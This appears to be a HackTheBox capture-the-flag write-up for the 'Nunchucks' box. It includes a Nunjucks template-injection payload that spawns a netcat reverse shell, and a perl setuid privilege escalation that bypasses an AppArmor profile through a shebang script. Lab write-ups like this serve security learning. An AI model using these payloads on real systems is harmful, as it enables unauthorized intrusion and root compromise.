An easy Linux box from HackTheBox, using an SSTI to get initial access, and a work around how AppArmor works with perl to get root.



Running the usual nmap, see there is a website on port 80

There is no ability to signup, despite there being a page for it

gobuster doesn’t return anything interesting either with the medium wordlist

Try to enumerate subdomains with wfuzz, -hh for filtering char length, specifying what I’m fuzzing with the Host header

sudo wfuzz -H "Host: FUZZ.nunchucks.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hh 30587 https://nunchucks.htb

It finds the store subdomain, when we navigate to it (after adding it to hosts file), the page looks like

When you submit an email, it reflects the input

Trying template injection, see that it works as it evaluates 10x2

Using burp to identify the technology with the reply HTTP message, can see that the site uses Express (with nodejs)

HTTP/1.1 304 Not Modified
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 10 May 2022 23:58:20 GMT
Connection: close
X-Powered-By: Express
ETag: W/"fbd-udK+KYlYFVN2Nn2DXdm1EXd8mv0"

Using the hacktricks template injection section, find that the templating system it uses is Nunjucks (haha) by fingerprinting with {{foo}} payload outputting nothing


Can inject in a way that executes system commands, and getting a reverse shell using the netcat on the system

{"email":"{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 6767 >/tmp/f')\")()}}"}

With the reverse shell run linpeas, it finds that perl has setuid priveledges

/usr/bin/perl = cap_setuid+ep

So to exploit, just run a set uid = 0 with a one liner

perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

But it doesn’t work, because the root directory is being protected by apparmor in /etc/apparmor.d/usr.bin.perl - found by linpeas but I didnt see it and though I was being a moron

/usr/bin/perl {  
 #include <abstractions/base>  
 #include <abstractions/nameservice>  
 #include <abstractions/perl>  
 capability setuid,  
 deny owner /etc/nsswitch.conf r,  
 deny /root/* rwx,  
 deny /etc/shadow rwx,  
 /usr/bin/id mrix,  
 /usr/bin/ls mrix,  
 /usr/bin/cat mrix,  
 /usr/bin/whoami mrix,  
 /opt/ mrix,  
 owner /home/ r,  
 owner /home/david/ r,    

However there is a bypass that when you run perl with a shebang in a script, it doesn’t restrict you, and you can spawn a shell

use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";

Then making it executable with chmod and executing gives you root